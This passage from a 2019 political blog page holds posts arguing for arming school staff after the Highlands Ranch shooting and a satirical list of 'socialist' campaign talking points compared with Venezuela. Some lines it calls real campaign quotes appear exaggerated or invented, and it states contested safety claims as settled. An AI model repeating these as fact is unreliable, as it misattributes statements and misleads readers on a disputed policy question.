advantages over uniformed police. Unlike the police, these volunteers are anonymous. Any adult staff member could be an armed defender. An attacker doesn&#8217;t know who is and who isn&#8217;t an armed and trained first responder. Unfortunately, we&#8217;ve seen School Resource Officers run away from an attack. We have not seen trained volunteers do that.</p> <p>Many defenders are better than fewer. Quantity has a quality of its own. It is better to have two adequate defenders on each hallway than to have a super-ninja at the other end of campus. The closer the first responders are to the problem, the sooner the threat will end and we can treat the injured. We can train the volunteers in a school district for the price of a single school resource officer.</p> <p>We now have classes for medical first responders in our school. Lots of school staff can be trained to stop bleeding and make sure the injured are still breathing when EMTs reach them. Oddly enough, some teachers unions wanted to fire school staff who receive trauma training. That shows the politics I talked about earlier. We can&#8217;t afford it.</p> <p>Less is more when it comes to training. The people who set the curriculum for first responders in our schools know what they are doing. They have decades of experience working with law enforcement agencies across the country. They have a very good idea of what first responders need, and what they don&#8217;t.</p> <p>Beware a politician who says that first responders &#8220;need&#8221; weeks or months of training. If they need that much time, then they are either the wrong candidate or they are being trained for the wrong job. I&#8217;ve seen what these volunteer defenders can do after 30 hours of training, and they are <span style="text-decoration:underline;">very</span> impressive. Imposing inappropriate training requirements means more of our children will die.</p> <p>I understand the concern we have for our kids safety. I hope this helps us ask the right questions. I think this is a more real perspective, and our children deserve that clarity.<br /> ~_~_~_</p> <p>I gave you 700 words. Please share them with a friend. RM</p> <p>&nbsp;</p> <div id="jp-post-flair" class="sharedaddy sd-rating-enabled sd-like-enabled sd-sharing-enabled"><div class="sd-block sd-rating"><h3 class="sd-title">Rate this:</h3><div class="cs-rating pd-rating" id="pd_rating_holder_4489229_post_15486" data-settings="{&quot;id&quot;:4489229,&quot;item_id&quot;:&quot;_post_15486&quot;,&quot;settings&quot;:&quot;{\&quot;id\&quot;:4489229,\&quot;unique_id\&quot;:\&quot;wp-post-15486\&quot;,\&quot;title\&quot;:\&quot;How%20to%20Skew%20the%20Debate%20and%20Get%20More%20Kids%26nbsp%3BKilled\&quot;,\&quot;permalink\&quot;:\&quot;https:\\\/\\\/slowfacts.wordpress.com\\\/2019\\\/05\\\/10\\\/how-to-skew-the-debate-and-get-more-kids-killed\\\/\&quot;,\&quot;item_id\&quot;:\&quot;_post_15486\&quot;}&quot;}"></div></div><div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-official sd-sharing"><h3 class="sd-title">Share this:</h3><div class="sd-content"><ul><li class="share-twitter"><a href="https://twitter.com/share" class="twitter-share-button" data-url="https://slowfacts.wordpress.com/2019/05/10/how-to-skew-the-debate-and-get-more-kids-killed/" data-text="How to Skew the Debate and Get More Kids Killed" data-via="wordpressdotcom" data-related="wordpressdotcom">Tweet</a></li><li class="share-facebook"><div class="fb-share-button" data-href="https://slowfacts.wordpress.com/2019/05/10/how-to-skew-the-debate-and-get-more-kids-killed/" data-layout="button_count"></div></li><li class="share-reddit"><div class="reddit_button"><iframe src="https://www.reddit.com/static/button/button1.html?newwindow=true&width=120&amp;url=https%3A%2F%2Fslowfacts.wordpress.com%2F2019%2F05%2F10%2Fhow-to-skew-the-debate-and-get-more-kids-killed%2F&amp;title=How%20to%20Skew%20the%20Debate%20and%20Get%20More%20Kids%20Killed" height="22" width="120" scrolling="no" frameborder="0"></iframe></div></li><li class="share-tumblr"><a class="tumblr-share-button" target="_blank" href="https://www.tumblr.com/share" data-title="How to Skew the Debate and Get More Kids Killed" data-content="https://slowfacts.wordpress.com/2019/05/10/how-to-skew-the-debate-and-get-more-kids-killed/" title="Share on Tumblr"data-posttype="link">Share on Tumblr</a></li><li class="share-pinterest"><div class="pinterest_button"><a href="https://www.pinterest.com/pin/create/button/?url=https%3A%2F%2Fslowfacts.wordpress.com%2F2019%2F05%2F10%2Fhow-to-skew-the-debate-and-get-more-kids-killed%2F&#038;media=https%3A%2F%2Fslowfacts.files.wordpress.com%2F2019%2F05%2Fsoldier-with-rifle.jpg&#038;description=How%20to%20Skew%20the%20Debate%20and%20Get%20More%20Kids%20Killed" data-pin-do="buttonPin" data-pin-config="beside"><img src="//assets.pinterest.com/images/pidgets/pinit_fg_en_rect_gray_20.png" /></a></div></li><li class="share-email"><a rel="nofollow noopener noreferrer" data-shared="" class="share-email sd-button" href="https://slowfacts.wordpress.com/2019/05/10/how-to-skew-the-debate-and-get-more-kids-killed/?share=email" target="_blank" title="Click to email this to a friend"><span>Email</span></a></li><li class="share-linkedin"><div class="linkedin_button"><script type="in/share" data-url="https://slowfacts.wordpress.com/2019/05/10/how-to-skew-the-debate-and-get-more-kids-killed/" data-counter="right"></script></div></li><li class="share-pocket"><div class="pocket_button"><a href="https://getpocket.com/save" class="pocket-btn" data-lang="en" data-save-url="https://slowfacts.wordpress.com/2019/05/10/how-to-skew-the-debate-and-get-more-kids-killed/" data-pocket-count="horizontal" >Pocket</a></div></li><li class="share-end"></li></ul></div></div></div><div class='sharedaddy sd-block sd-like jetpack-likes-widget-wrapper jetpack-likes-widget-unloaded' id='like-post-wrapper-23064700-15486-5cdd8cd9f22de' data-src='//widgets.wp.com/likes/index.html?ver=20190321#blog_id=23064700&amp;post_id=15486&amp;origin=slowfacts.wordpress.com&amp;obj_id=23064700-15486-5cdd8cd9f22de' data-name='like-post-frame-23064700-15486-5cdd8cd9f22de'><h3 class='sd-title'>Like this:</h3><div class='likes-widget-placeholder post-likes-widget-placeholder' style='height: 55px;'><span class='button'><span>Like</span></span> <span class="loading">Loading...</span></div><span class='sd-text-color'></span><a class='sd-link-color'></a></div></div> </div><!--end entry--> <div class="post-footer"> <div class="comments"><a href="https://slowfacts.wordpress.com/2019/05/10/how-to-skew-the-debate-and-get-more-kids-killed/#comments">4 Comments</a></div> <div class="categories">from &rarr; <a href="https://slowfacts.wordpress.com/category/faster/" rel="category tag">FASTER</a></div> </div><!--end post footer--> </div><!--end post--> <div id="post-15482" class="post-15482 post type-post status-publish format-standard hentry category-faster tag-faster"> <div class="post-header"> <h2><a href="https://slowfacts.wordpress.com/2019/05/08/school-shootings-plastic-signs-and-synthetic-emotions/" rel="bookmark">School Shootings- Plastic Signs and Synthetic&nbsp;Emotions</a></h2> <div class="date">May 8, 2019</div> </div><!--end post header--> <div class="meta clear"> <div class="tags">tags: <a href="https://slowfacts.wordpress.com/tag/faster/" rel="tag">FASTER</a></div> <div class="author"> </div> </div><!--end meta--> <div class="entry clear"> <p>Two armed murderers entered a school south of Denver yesterday.  I&#8217;m sure that a number of special interests will place the blame for these attacks. They never let an atrocity go to waste. I&#8217;ve seen everything from global warming to the political party in office used as a scapegoat to promote assorted causes. I want to be careful about what we know, what is probably true, and what we should expect. One thing we know is that this attack doesn&#8217;t come as a surprise.</p> <p>One of the murderers was a trans-sexual female who preferred to be called a boy. The other murderer was an 18 year old male. Preliminary reports indicate the male student felt bullied. Both murderers used handguns to attack students and staff.</p> <p>We can speculate about their motive. If they were at all like the vast majority of mass murderers in recent years, these murderers counted on the mass media to turn them into instant celebrities. If our media treats these murders as they treated earlier murderers, then the attackers will receive a billion dollars of free publicity. Time after time, that media promotional campaign pays for the next narcissistic murderer who wants to see his name in the news.</p> <p>That isn&#8217;t speculation; it is a conclusion reached by both psychological research and by investigating previous mass murderers. This media campaign earns the news organization big bucks by delivering new viewers. It is paid for with the blood of our children.</p> <p>We know that the police response at this Highlands Ranch school was extraordinary. The police arrived in a few minutes. In those two minutes, these murderers shot eight people and one of them died. Some of the victims remain at risk. The usual response time is more than 5 minutes.</p> <p>That brings us to the reality that most parents want to evade. Even two minutes is too long to wait for help. Any armed individual can shoot many people if the murderer is unopposed for several minutes.</p> <p>That isn&#8217;t because of the particular characteristics of the weapon that makes the attack so deadly, but the fact that the murderers were attacking victims who could neither run to safety nor fight back. As we&#8217;ve seen before, the murderers carefully chose their victims and the location of the attack. The murderers wanted easy victims and that is what we delivered. We consciously chose to protect our children with plastic signs that said no-guns allowed.<a href="https://slowfacts.files.wordpress.com/2012/07/no_guns_allowed_4.jpg"><img data-attachment-id="3341" data-permalink="https://slowfacts.wordpress.com/2012/07/20/a-gun-free-zone-in-name-only/no_guns_allowed_4-5/" data-orig-file="https://slowfacts.files.wordpress.com/2012/07/no_guns_allowed_4.jpg" data-orig-size="499,492" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;}" data-image-title="no_guns_allowed_4" data-image-description="" data-medium-file="https://slowfacts.files.wordpress.com/2012/07/no_guns_allowed_4.jpg?w=304" data-large-file="https://slowfacts.files.wordpress.com/2012/07/no_guns_allowed_4.jpg?w=499" class="alignleft wp-image-3341 size-thumbnail" src="https://slowfacts.files.wordpress.com/2012/07/no_guns_allowed_4.jpg?w=150&#038;h=148" alt="" width="150" height="148" srcset="https://slowfacts.files.wordpress.com/2012/07/no_guns_allowed_4.jpg?w=150&amp;h=148 150w, https://slowfacts.files.wordpress.com/2012/07/no_guns_allowed_4.jpg?w=300&amp;h=296 300w" sizes="(max-width: 150px) 100vw, 150px" /></a></p> <p>&nbsp;</p> <p>I&#8217;ve trained with school staff who volunteered to be armed first responders. They trained to stop an armed threat and to stop the bleeding until EMTs arrive. I took this training in central Colorado alongside teachers from Colorado. As far as I know, none of my classmates were from the Highlands School District where the attack occurred. The teachers I met were passionate about saving lives. I suspect that there are many school staff in the Highlands district who feel the same way as the teachers I saw.</p> <p>Like many other school districts, the school staff with whom I trained were there because their school board and school superintendents decided to protect their students. These volunteer school staff were not willing to wait as their students were murdered. They were not willing to blame someone else, when instead, they could protect their students and save lives until police and EMTs arrived.</p> <p>Every mass murder is unique, but each ones follows a general pattern. We have never seen a plastic &#8220;no-gun sign&#8221; stop a mass murderer. In contrast, we have yet to see a murderer attack a school where armed school staff were present. Earlier I&#8217;d claimed that plastic signs are ineffective, but the plastic sign that says &#8220;armed staff&#8221; seems to work so far. We have accumulated millions of school days with armed staff on campus. So far they have been both safe and effective.</p> <div data-shortcode="caption" id="attachment_7167" style="width: 198px" class="wp-caption alignright"><a href="https://slowfacts.files.wordpress.com/2013/06/armed.jpg"><img aria-describedby="caption-attachment-7167" data-attachment-id="7167" data-permalink="https://slowfacts.wordpress.com/2013/06/09/gun-free-zone-fails-murder-at-santa-monica-college/armed-3/" data-orig-file="https://slowfacts.files.wordpress.com/2013/06/armed.jpg" data-orig-size="454,414" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;}" data-image-title="Staff May be Armed" data-image-description="" data-medium-file="https://slowfacts.files.wordpress.com/2013/06/armed.jpg?w=329" data-large-file="https://slowfacts.files.wordpress.com/2013/06/armed.jpg?w=454" class=" wp-image-7167" src="https://slowfacts.files.wordpress.com/2013/06/armed.jpg?w=188&#038;h=172" alt="" width="188" height="172" srcset="https://slowfacts.files.wordpress.com/2013/06/armed.jpg?w=188&amp;h=172 188w, https://slowfacts.files.wordpress.com/2013/06/armed.jpg?w=376&amp;h=344 376w, https://slowfacts.files.wordpress.com/2013/06/armed.jpg?w=150&amp;h=137 150w, https://slowfacts.files.wordpress.com/2013/06/armed.jpg?w=329&amp;h=300 329w" sizes="(max-width: 188px) 100vw, 188px" /></a><p id="caption-attachment-7167" class="wp-caption-text">Staff May be Armed</p></div> <p>That shouldn&#8217;t surprise anyone. We wouldn&#8217;t turn off the fire alarms, remove fire extinguishers and first aid boxes at our schools and replace them with a plastic sign that says &#8220;No Fire Allowed&#8221;. That would be ridiculous, yet we did that when it came to protecting our children from violence on campus.</p> <p>We expect adults at the scene to be first responders until professionals arrive. We expect adults to stop small fires and treat injuries if they can.. even if it doesn&#8217;t say that in their union contract. In my experience, teachers are protectors who want to take care of &#8220;their kids.&#8221;</p> <p>Our luck won&#8217;t last. At some point, an attacker will choose a school with armed staff. You and I pray that never happens. Thank god there are a few teachers who pray they are there in time to stop the murderer. I thank them every day. More school staff wish they could be defenders. I know this because I&#8217;ve met many of them and they told me so.</p> <p>I&#8217;ve listened to law enforcement officials from across the country who want school staff to be trained and armed. Law enforcement officers see violence every day. I suspect that makes many of us uncomfortable. Rather than take the advice of professionals who deal with violence, we want to pretend that violence doesn&#8217;t exist. We want to pretend that a sign will keep us safe and keep our children safe.</p> <p>It wasn&#8217;t the plastic &#8220;no-guns&#8221; sign that failed in Highland, but the adults who believed it. We can fix that tomorrow.. and we should.<br /> ~_~_~_</p> <p>I gave you 900 words and a piece of my heart. Please share them with a friend. RM</p> <p>&nbsp;</p> <div id="jp-post-flair" class="sharedaddy sd-rating-enabled sd-like-enabled sd-sharing-enabled"><div class="sd-block sd-rating"><h3 class="sd-title">Rate this:</h3><div class="cs-rating pd-rating" id="pd_rating_holder_4489229_post_15482" data-settings="{&quot;id&quot;:4489229,&quot;item_id&quot;:&quot;_post_15482&quot;,&quot;settings&quot;:&quot;{\&quot;id\&quot;:4489229,\&quot;unique_id\&quot;:\&quot;wp-post-15482\&quot;,\&quot;title\&quot;:\&quot;School%20Shootings-%20Plastic%20Signs%20and%20Synthetic%26nbsp%3BEmotions\&quot;,\&quot;permalink\&quot;:\&quot;https:\\\/\\\/slowfacts.wordpress.com\\\/2019\\\/05\\\/08\\\/school-shootings-plastic-signs-and-synthetic-emotions\\\/\&quot;,\&quot;item_id\&quot;:\&quot;_post_15482\&quot;}&quot;}"></div></div><div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-official sd-sharing"><h3 class="sd-title">Share this:</h3><div class="sd-content"><ul><li class="share-twitter"><a href="https://twitter.com/share" class="twitter-share-button" data-url="https://slowfacts.wordpress.com/2019/05/08/school-shootings-plastic-signs-and-synthetic-emotions/" data-text="School Shootings- Plastic Signs and Synthetic Emotions" data-via="wordpressdotcom" data-related="wordpressdotcom">Tweet</a></li><li class="share-facebook"><div class="fb-share-button" data-href="https://slowfacts.wordpress.com/2019/05/08/school-shootings-plastic-signs-and-synthetic-emotions/" data-layout="button_count"></div></li><li class="share-reddit"><div class="reddit_button"><iframe src="https://www.reddit.com/static/button/button1.html?newwindow=true&width=120&amp;url=https%3A%2F%2Fslowfacts.wordpress.com%2F2019%2F05%2F08%2Fschool-shootings-plastic-signs-and-synthetic-emotions%2F&amp;title=School%20Shootings-%20Plastic%20Signs%20and%20Synthetic%20Emotions" height="22" width="120" scrolling="no" frameborder="0"></iframe></div></li><li class="share-tumblr"><a class="tumblr-share-button" target="_blank" href="https://www.tumblr.com/share" data-title="School Shootings- Plastic Signs and Synthetic Emotions" data-content="https://slowfacts.wordpress.com/2019/05/08/school-shootings-plastic-signs-and-synthetic-emotions/" title="Share on Tumblr"data-posttype="link">Share on Tumblr</a></li><li class="share-pinterest"><div class="pinterest_button"><a href="https://www.pinterest.com/pin/create/button/?url=https%3A%2F%2Fslowfacts.wordpress.com%2F2019%2F05%2F08%2Fschool-shootings-plastic-signs-and-synthetic-emotions%2F&#038;media=https%3A%2F%2Fslowfacts.files.wordpress.com%2F2012%2F07%2Fno_guns_allowed_4.jpg%3Fw%3D150&#038;description=School%20Shootings-%20Plastic%20Signs%20and%20Synthetic%20Emotions" data-pin-do="buttonPin" data-pin-config="beside"><img src="//assets.pinterest.com/images/pidgets/pinit_fg_en_rect_gray_20.png" /></a></div></li><li class="share-email"><a rel="nofollow noopener noreferrer" data-shared="" class="share-email sd-button" href="https://slowfacts.wordpress.com/2019/05/08/school-shootings-plastic-signs-and-synthetic-emotions/?share=email" target="_blank" title="Click to email this to a friend"><span>Email</span></a></li><li class="share-linkedin"><div class="linkedin_button"><script type="in/share" data-url="https://slowfacts.wordpress.com/2019/05/08/school-shootings-plastic-signs-and-synthetic-emotions/" data-counter="right"></script></div></li><li class="share-pocket"><div class="pocket_button"><a href="https://getpocket.com/save" class="pocket-btn" data-lang="en" data-save-url="https://slowfacts.wordpress.com/2019/05/08/school-shootings-plastic-signs-and-synthetic-emotions/" data-pocket-count="horizontal" >Pocket</a></div></li><li class="share-end"></li></ul></div></div></div><div class='sharedaddy sd-block sd-like jetpack-likes-widget-wrapper jetpack-likes-widget-unloaded' id='like-post-wrapper-23064700-15482-5cdd8cda0167e' data-src='//widgets.wp.com/likes/index.html?ver=20190321#blog_id=23064700&amp;post_id=15482&amp;origin=slowfacts.wordpress.com&amp;obj_id=23064700-15482-5cdd8cda0167e' data-name='like-post-frame-23064700-15482-5cdd8cda0167e'><h3 class='sd-title'>Like this:</h3><div class='likes-widget-placeholder post-likes-widget-placeholder' style='height: 55px;'><span class='button'><span>Like</span></span> <span class="loading">Loading...</span></div><span class='sd-text-color'></span><a class='sd-link-color'></a></div></div> </div><!--end entry--> <div class="post-footer"> <div class="comments"><a href="https://slowfacts.wordpress.com/2019/05/08/school-shootings-plastic-signs-and-synthetic-emotions/#comments">4 Comments</a></div> <div class="categories">from &rarr; <a href="https://slowfacts.wordpress.com/category/faster/" rel="category tag">FASTER</a></div> </div><!--end post footer--> </div><!--end post--> <div id="post-15472" class="post-15472 post type-post status-publish format-standard hentry category-politics tag-politics"> <div class="post-header"> <h2><a href="https://slowfacts.wordpress.com/2019/05/08/political-lies-and-the-aging-revolution/" rel="bookmark">Political Lies and the Aging&nbsp;Revolution</a></h2> <div class="date">May 8, 2019</div> </div><!--end post header--> <div class="meta clear"> <div class="tags">tags: <a href="https://slowfacts.wordpress.com/tag/politics/" rel="tag">politics</a></div> <div class="author"> </div> </div><!--end meta--> <div class="entry clear"> <p>The Venezuelan government is murdering its people. The government took over education and now the schools are closed. The government took over the Venezuelan oil industry and now there is no oil or gas. The government took over hospitals and the power grid, and patients die in the dark. The government took over the news media, and now the Venezuelan people only receive propaganda.. on the rare occasion when there is power to run their radios and TVs. How is this possible?</p> <p>The Venezuelan government said they would protect the people. The government confiscated private guns.. and then gave guns to gangs of thugs loyal to the Venezuelan government. Now, the Venezuelan military and its Cuban advisors shoot unarmed civilians. The army uses their armored cars to run over protesters.</p> <p>I could shake my head and feel superior.. except US politicians today say to us the same things that Chavez and Maduro said years ago. This isn&#8217;t the slippery slope of politics leading good men to political corruption. This is a well worn path of Socialist lies. Do you recognize these campaign talking-points.. and the subsequent excuses? Have you been paying attention?</p> <p><a href="https://slowfacts.files.wordpress.com/2019/05/socialsts-2020-1.jpg"><img data-attachment-id="15478" data-permalink="https://slowfacts.wordpress.com/2019/05/08/political-lies-and-the-aging-revolution/socialsts-2020-2/" data-orig-file="https://slowfacts.files.wordpress.com/2019/05/socialsts-2020-1.jpg" data-orig-size="828,318" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1557324637&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="Socialsts 2020" data-image-description="" data-medium-file="https://slowfacts.files.wordpress.com/2019/05/socialsts-2020-1.jpg?w=400" data-large-file="https://slowfacts.files.wordpress.com/2019/05/socialsts-2020-1.jpg?w=600" class="size-large wp-image-15478 aligncenter" src="https://slowfacts.files.wordpress.com/2019/05/socialsts-2020-1.jpg?w=600&#038;h=230" alt="" width="600" height="230" srcset="https://slowfacts.files.wordpress.com/2019/05/socialsts-2020-1.jpg?w=600&amp;h=230 600w, https://slowfacts.files.wordpress.com/2019/05/socialsts-2020-1.jpg?w=150&amp;h=58 150w, https://slowfacts.files.wordpress.com/2019/05/socialsts-2020-1.jpg?w=400&amp;h=154 400w, https://slowfacts.files.wordpress.com/2019/05/socialsts-2020-1.jpg?w=768&amp;h=295 768w, https://slowfacts.files.wordpress.com/2019/05/socialsts-2020-1.jpg 828w" sizes="(max-width: 600px) 100vw, 600px" /></a></p> <h3>Education-</h3> <ul> <li>We need to make education free to everyone.</li> <li>So everyone feels included on campus, we need to impose a few common sense restrictions on free speech.</li> <li>Conservative speech is violence.</li> <li>The student body has to reflect our country&#8217;s new future. Conservative ideals are outmoded in their insistence on morality and truth.. said the Socialist candidates.</li> </ul> <h3>Energy Policy-</h3> <ul> <li>The county is finally independent of foreign sources of oil and gas.. so Socialists propose eliminating fossil fuels and taking over the oil companies.</li> <li>These new restrictions on energy will soon payoff in lower healthcare costs and greater employment as we retool our economy.</li> <li>These economic ups-and-downs happen to everyone. We have a few shovel ready projects that will get the economy rolling again.</li> <li>Fossil and nuclear power plants are unsustainable. Besides, you should walk more.</li> <li>Of course government officials can use cars even when you can’t.. said the Socialist politician everywhere.</li> </ul> <h3>Open Borders-</h3> <ul> <li>Heaven doesn’t have borders.</li> <li>Immigrants only take the jobs our citizens won’t do.</li> <li>Those are not criminals since you really can’t compare the justice system in one country to the justice system in another country.</li> <li>Didn’t you listen? Of course illegal immigrants have the right to vote and go on welfare.. said the Socialists candidates.</li> </ul> <h3>Health Care-</h3> <ul> <li>Everyone deserves free health care.</li> <li>Illegal immigrants have the right to social security benefits. Sign up right here where you register to vote.</li> <li>Your medical care is now provided by the same people who run the DMV and Social Security. They will determine when you&#8217;re eligible for treatment. Just take a number and wait.</li> <li>Of course government officials can have their own healthcare system.. said the Socialist candidates everywhere.</li> </ul> <h3>Economic Freedom-</h3> <ul> <li>How can you protest paying taxes when some people are still in need?</li> <li>We need to control rents since people can no longer afford their own homes.</li> <li>Taxes need to increase so we can meet government pensions because breaking our promises would be unfair to workers.</li> <li>We’re not trying to control you. We only need you to file this certificate so we can plan for the changing economy.</li> <li>Everything that is not permitted is not allowed.. said the Socialists politicians.</li> </ul> <h3>Armed Defense-</h3> <ul> <li>I’m a gun owner too. We’d never take your guns.</li> <li>Rape is not a violent crime, so guns and pepper spray are not allowed on campus. Disarming you is for your own good.</li> <li>Safety comes first. That is why anyone can demand you be disarmed so that someone else feels safe.</li> <li>You must be a terrible shot if you need an AR rifle for defense. The police will protect you and only government employees should be armed.. with AR rifles of course.</li> <li>Anyone who doesn’t turn in their guns is a violent revolutionary and should be jailed or shot for the public good.. said the Socialists politicians everywhere.</li> </ul> <p><a href="https://slowfacts.files.wordpress.com/2019/05/630maduchavez.jpg"><img data-attachment-id="15476" data-permalink="https://slowfacts.wordpress.com/2019/05/08/political-lies-and-the-aging-revolution/630maduchavez/" data-orig-file="https://slowfacts.files.wordpress.com/2019/05/630maduchavez.jpg" data-orig-size="630,461" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="630maduchavez" data-image-description="" data-medium-file="https://slowfacts.files.wordpress.com/2019/05/630maduchavez.jpg?w=400" data-large-file="https://slowfacts.files.wordpress.com/2019/05/630maduchavez.jpg?w=600" class="size-medium wp-image-15476 aligncenter" src="https://slowfacts.files.wordpress.com/2019/05/630maduchavez.jpg?w=400&#038;h=293" alt="" width="400" height="293" srcset="https://slowfacts.files.wordpress.com/2019/05/630maduchavez.jpg?w=400&amp;h=293 400w, https://slowfacts.files.wordpress.com/2019/05/630maduchavez.jpg?w=150&amp;h=110 150w, https://slowfacts.files.wordpress.com/2019/05/630maduchavez.jpg 630w" sizes="(max-width: 400px) 100vw, 400px" /></a></p> <p>These quotes are straight from the campaign speeches of our current crop of Socialists candidates.. and from the news coverage of the Venezuelan &#8220;revolution&#8221;.  They overlap, and I can&#8217;t tell where one ends and the other begins.</p> <p>It turns out that our Socialist candidates are not as modern and cutting edge as they claim. Their campaign proposals are the same old something-for-nothing promises that lured people to socialism before. I&#8217;m hearing the same old &#8220;revolution&#8221; wrapped in well-worn lies. Those lies don&#8217;t age well.</p> <p>They call it a political &#8220;campaign&#8221; for a reason. Will the same old lies work this time?<br /> ~_~_</p> <p>I gave you 700 words. Please share them with a friend. RM</p> <div id="jp-post-flair" class="sharedaddy sd-rating-enabled sd-like-enabled sd-sharing-enabled"><div class="sd-block sd-rating"><h3 class="sd-title">Rate this:</h3><div class="cs-rating pd-rating" id="pd_rating_holder_4489229_post_15472" data-settings="{&quot;id&quot;:4489229,&quot;item_id&quot;:&quot;_post_15472&quot;,&quot;settings&quot;:&quot;{\&quot;id\&quot;:4489229,\&quot;unique_id\&quot;:\&quot;wp-post-15472\&quot;,\&quot;title\&quot;:\&quot;Political%20Lies%20and%20the%20Aging%26nbsp%3BRevolution\&quot;,\&quot;permalink\&quot;:\&quot;https:\\\/\\\/slowfacts.wordpress.com\\\/2019\\\/05\\\/08\\\/political-lies-and-the-aging-revolution\\\/\&quot;,\&quot;item_id\&quot;:\&quot;_post_15472\&quot;}&quot;}"></div></div><div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-official sd-sharing"><h3 class="sd-title">Share this:</h3><div class="sd-content"><ul><li class="share-twitter"><a href="https://twitter.com/share" class="twitter-share-button" data-url="https://slowfacts.wordpress.com/2019/05/08/political-lies-and-the-aging-revolution/" data-text="Political Lies and the Aging Revolution" data-via="wordpressdotcom" data-related="wordpressdotcom">Tweet</a></li><li class="share-facebook"><div class="fb-share-button" data-href="https://slowfacts.wordpress.com/2019/05/08/political-lies-and-the-aging-revolution/" data-layout="button_count"></div></li><li class="share-reddit"><div class="reddit_button"><iframe src="https://www.reddit.com/static/button/button1.html?newwindow=true&width=120&amp;url=https%3A%2F%2Fslowfacts.wordpress.com%2F2019%2F05%2F08%2Fpolitical-lies-and-the-aging-revolution%2F&amp;title=Political%20Lies%20and%20the%20Aging%20Revolution" height="22" width="120" scrolling="no" frameborder="0"></iframe></div></li><li class="share-tumblr"><a class="tumblr-share-button" target="_blank" href="https://www.tumblr.com/share" data-title="Political Lies and the Aging Revolution" data-content="https://slowfacts.wordpress.com/2019/05/08/political-lies-and-the-aging-revolution/" title="Share on Tumblr"data-posttype="link">Share on Tumblr</a></li><li class="share-pinterest"><div class="pinterest_button"><a href="https://www.pinterest.com/pin/create/button/?url=https%3A%2F%2Fslowfacts.wordpress.com%2F2019%2F05%2F08%2Fpolitical-lies-and-the-aging-revolution%2F&#038;media=https%3A%2F%2Fslowfacts.files.wordpress.com%2F2019%2F05%2Fsocialsts-2020-1.jpg&#038;description=Political%20Lies%20and%20the%20Aging%20Revolution" data-pin-do="buttonPin" data-pin-config="beside"><img src="//assets.pinterest.com/images/pidgets/pinit_fg_en_rect_gray_20.png" /></a></div></li><li class="share-email"><a rel="nofollow noopener noreferrer" data-shared="" class="share-email sd-button" href="https://slowfacts.wordpress.com/2019/05/08/political-lies-and-the-aging-revolution/?share=email" target="_blank" title="Click to email this to a friend"><span>Email</span></a></li><li class="share-linkedin"><div class="linkedin_button"><script type="in/share" data-url="https://slowfacts.wordpress.com/2019/05/08/political-lies-and-the-aging-revolution/" data-counter="right"></script></div></li><li class="share-pocket"><div class="pocket_button"><a href="https://getpocket.com/save" class="pocket-btn" data-lang="en" data-save-url="https://slowfacts.wordpress.com/2019/05/08/political-lies-and-the-aging-revolution/" data-pocket-count="horizontal" >Pocket</a></div></li><li class="share-end"></li></ul></div></div></div><div class='sharedaddy sd-block sd-like jetpack-likes-widget-wrapper jetpack-likes-widget-unloaded' id='like-post-wrapper-23064700-15472-5cdd8cda039ad' data-src='//widgets.wp.com/likes/index.html?ver=20190321#blog_id=23064700&amp;post_id=15472&amp;origin=slowfacts.wordpress.com&amp;obj_id=23064700-15472-5cdd8cda039ad' data-name='like-post-frame-23064700-15472-5cdd8cda039ad'><h3 class='sd-title'>Like this:</h3><div class='likes-widget-placeholder post-likes-widget-placeholder' style='height: 55px;'><span class='button'><span>Like</span></span> <span class="loading">Loading...</span></div><span class='sd-text-color'></span><a class='sd-link-color'></a></div></div> </div><!--end entry--> <div class="post-footer"> <div class="comments"><a href="https://slowfacts.wordpress.com/2019/05/08/political-lies-and-the-aging-revolution/#comments">1 Comment</a></div> <div class="categories">from &rarr; <a href="https://slowfacts.wordpress.com/category/politics/" rel="category tag">politics</a></div> </div><!--end post footer--> </div><!--end post--> <div id="post-15463" class="post-15463 post type-post status-publish format-standard hentry category-corruption category-government-corruption category-politics tag-corruption tag-government tag-politics"> <div class="post-header"> <h2><a href="https://slowfacts.wordpress.com/2019/05/01/the-truth-of-socialism-on-the-little-screen/" rel="bookmark">The Truth of Socialism on the Little&nbsp;Screen</a></h2> <div class="date">May 1, 2019</div> </div><!--end post header--> <div class="meta clear"> <div class="tags">tags: <a href="https://slowfacts.wordpress.com/tag/corruption/" rel="tag">corruption</a>, <a href="https://slowfacts.wordpress.com/tag/government/" rel="tag">government</a>, <a href="https://slowfacts.wordpress.com/tag/politics/" rel="tag">politics</a></div> <div class="author"> </div> </div><!--end meta--> <div class="entry clear"> <p>We know socialism fails. The question remains if citizens will believe the 